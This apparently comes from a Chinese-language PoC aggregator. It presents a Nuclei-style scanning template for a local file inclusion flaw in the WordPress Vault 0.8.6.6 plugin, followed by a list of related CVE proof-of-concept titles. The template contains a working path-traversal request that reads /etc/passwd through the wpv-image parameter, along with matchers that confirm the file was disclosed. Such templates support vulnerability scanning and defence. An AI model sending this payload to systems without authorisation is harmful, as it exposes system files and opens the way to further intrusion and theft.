wp-vault-local-file-inclusion: WordPress Vault 0.8.6.6 - Local File Inclusion

漏洞描述

PoC代码[已公开]

id: wp-vault-local-file-inclusion

info:
  name: WordPress Vault 0.8.6.6 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress Vault 0.8.6.6 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/40850
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: lfi,edb,wp-plugin,wordpress,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200b958d1a5f1d9eb1c17acb8acbd00e7ded2d804fd3d576ab4d13142ef16f4c59022100f5a5ac1d03cd1e181b99658d9172ce5508833483968be8017370ee283ba61181:922c64590222798bb761d5b6d8e72950

相关漏洞推荐

• POC CVE-2019-10647: ZZZCMS ZZZPHP 1.6.3 – Remote PHP Code Execution (RCE)
• POC CVE-2019-14950: WP Live Chat Support <= 8.0.27 — Stored Cross-Site Scripting
• POC CVE-2019-17671: WordPress <= 5.2.4 - Unauthenticated View Private/Draft Posts
• POC CVE-2019-4061: IBM BigFix Platform - Information Disclosure
• POC CVE-2020-20627: GiveWP - Missing Authorization to Settings Update
• POC CVE-2020-26836: SAP Solution Manager - Open Redirect
• POC CVE-2021-2135: Oracle WebLogic Server - Remote Code Execution
• POC CVE-2021-23394: elFinder < 2.1.58 - Remote Code Execution
• POC CVE-2021-37415: Zoho ManageEngine ServiceDesk Plus - Authentication Bypass
• POC CVE-2021-4073: RegistrationMagic <= 5.0.1.7 - Authentication Bypass
• POC CVE-2022-0879: Caldera Forms < 1.9.7 - Reflected Cross-Site Scripting
• POC CVE-2023-23897: Ozette Plugins - Cross-Site Request Forgery
• POC CVE-2023-3388: Beautiful Cookie Consent Banner < 2.10.2 - Cross-Site Scripting